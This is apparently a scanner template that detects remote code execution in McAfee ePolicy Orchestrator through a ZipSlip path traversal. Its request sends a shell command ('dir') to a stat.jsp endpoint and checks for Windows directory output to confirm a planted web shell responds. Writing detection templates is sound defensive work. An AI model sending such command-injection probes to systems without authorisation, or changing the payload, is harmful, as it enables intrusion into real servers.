id: mcafee-epo-rce

info:
  name: McAfee ePolicy Orchestrator RCE
  author: dwisiswant0
  severity: high
  description: |
    A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO)
    is a type of Path Traversal occurring when archives are unpacked
    if the names of the packed files are not properly sanitized.
    An attacker can create archives with files containing "../" in their names,
    making it possible to upload arbitrary files
    to arbitrary directories or overwrite existing ones during archive extraction.
  reference:
    - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
  tags: mcafee,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "text/html"
        part: header
      - type: regex
        regex:
          - "Volume (in drive [A-Z]|Serial Number) is"
        part: body